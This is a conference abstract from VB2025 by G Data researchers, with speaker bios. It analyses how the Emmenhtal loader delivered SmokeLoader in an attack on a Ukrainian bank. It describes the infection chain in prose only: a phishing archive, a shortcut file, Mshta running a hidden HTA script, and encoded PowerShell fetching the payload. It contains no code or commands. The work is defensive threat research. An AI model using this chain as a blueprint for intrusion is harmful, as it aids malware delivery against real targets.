This is a reserve paper. Should it not be required to replace a paper on the main programme, it will be presented in the Small Talks room on Friday 26 September.
Lovely Antonio, Ricardo Pineda & Louis Sorita (G Data AV Lab)
Modern malware distribution is evolving, with commodity loaders transforming into sophisticated malware-as-a-service (MaaS) platforms. One such loader, Emmenhtal, has emerged as a key player in financially motivated cybercrime, initially being used to distribute infostealers like CryptBot and Lumma. However, recent campaigns indicate a strategic pivot, integrating Emmenhtal with SmokeLoader, a well-established modular malware known for code injection, persistence, and stealthy payload execution. The discovery of this new method remains largely unknown to the public.
This research dissects Emmenhtal's evasive execution flow, its strategic abuse of living-off-the-land binaries and scripts (LOLBAS) like Mshta and PowerShell for covert operation, and its growing significance in the malware-as-a-service landscape.
The primary focus of our research is the observed recent attack on First Ukrainian International Bank (pumb.ua): Emmenhtal facilitated a multi-stage infection chain designed to bypass traditional security controls. The campaign began with a phishing email with a 7z archive attached containing a bait PDF and a downloader shortcut, leading to the retrieval of a malicious .lnk file. This .lnk file leveraged Mshta to execute a hidden HTA script embedded inside a trojanized DCCW.exe binary, maintaining a stealthy footprint. The HTA script interpreted the embedded JavaScript, which then launched an encoded PowerShell script. This PowerShell script is responsible for downloading and executing the SmokeLoader payload.
By understanding Emmenhtal's evolution and operational techniques, we will present how modern loaders are reshaping the threat landscape, and how we can refine our detection and mitigation strategies.
Lovely Antonio Lovely has over 12 years of experience in the information security industry, specializing in threat research, analysis, and creating detection signatures. Recently, she has focused on curating training curriculums and career programs for employee upskilling. She has participated in malware research projects and previously presented at AVAR conferences. She is happily married to a fellow researcher, and they enjoy exploring foods and travelling together.
|
|
Ricardo Pineda Ricardo has over 20 years of experience in the cybersecurity industry, specializing in threat research, analysis, and creating detection signatures. Throughout his career, he has contributed to developing advanced security measures, helping organizations stay ahead of emerging threats. In recent years, he has also focused on mentoring and knowledge-sharing, ensuring the next generation of cybersecurity professionals is well equipped to tackle evolving challenges. Happily married for 12 years, Ricardo enjoys spending time with his family, including his two children. Outside of work, he is an avid RPG gamer, finding relaxation and creativity in immersive story-driven worlds.
|
|
Louis Sorita Louis is a seasoned cybersecurity professional with 12 years of experience in the field. As a senior virus analyst, he specializes in threat research and detection, proactive threat hunting, and delivering internal cybersecurity training to enhance organizational resilience. Recently entering married life, Louis also enjoys playing video games, particularly soulslike titles that challenge his strategic thinking and perseverance. |
Back to VB2025 conference page